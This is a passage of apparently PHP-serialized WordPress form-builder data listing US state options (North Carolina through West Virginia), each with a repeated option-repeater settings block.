Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"33\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"34\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"35\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"36\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"37\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"38\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"39\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"40\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"41\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"42\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"43\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"44\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"45\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"46\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"47\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"48\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 